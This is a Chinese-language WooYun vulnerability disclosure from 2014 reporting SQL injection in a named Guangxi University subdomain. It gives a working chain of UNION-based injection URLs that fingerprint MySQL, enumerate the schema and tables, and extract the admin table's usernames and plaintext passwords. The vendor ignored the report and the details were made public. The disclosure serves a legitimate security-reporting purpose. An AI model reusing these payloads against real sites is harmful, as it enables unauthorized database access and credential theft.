漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-064690
漏洞标题:广西大学某分站存在SQL注入
相关厂商:广西大学
漏洞作者: 路人甲
提交时间:2014-06-12 18:57
修复时间:2014-06-17 18:58
公开时间:2014-06-17 18:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:13
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-06-12: 细节已通知厂商并且等待厂商处理中
2014-06-17: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
存在数字型的SQL注入,这么大的一个大学随便买个WAF拦截一下也不至于那么多SQL注入啊~~话说主站那个注入依然存在...
详细说明:
注入点
http://mi.gxu.edu.cn/content.php?id=1356
通过逻辑判断存在SQL注入,但是比较隐藏
判断一下版本5的mysql
http://mi.gxu.edu.cn/content.php?id=1356 AND MID(VERSION(),1,1) = 5
通过order by判断出字段为2
然后通过union查询获取信息
漏洞证明:
http://mi.gxu.edu.cn/content.php?id=1356 UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2
隐藏在html代码中
sxx@HP-GXSXXYJFFWQ
sxxy
5.0.19-nt
暴库
http://mi.gxu.edu.cn/content.php?id=1356 UNION SELECT group_concat(distinct+table_schema),2 from information_schema.columns
information_schema,sxxy
爆表
http://mi.gxu.edu.cn/content.php?id=1356 UNION SELECT group_concat(distinct+table_name),2 from information_schema.columns where table_schema=database()
admin主要是个,其它的就不列出来了
爆admin的列
http://mi.gxu.edu.cn/content.php?id=1356 UNION SELECT group_concat(distinct+column_name),2 from information_schema.columns where table_name=0x61646D696E
主要是这两个ADM_USER,ADM_PASS ....
爆用户和密码
http://mi.gxu.edu.cn/content.php?id=1356 UNION SELECT group_concat(distinct+concat(ADM_USER,0x2c,ADM_PASS)),2 from admin
全部是明文的密码~~
就到这里吧....
修复方案:
过滤....
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-17 18:58
厂商回复:
最新状态:
暂无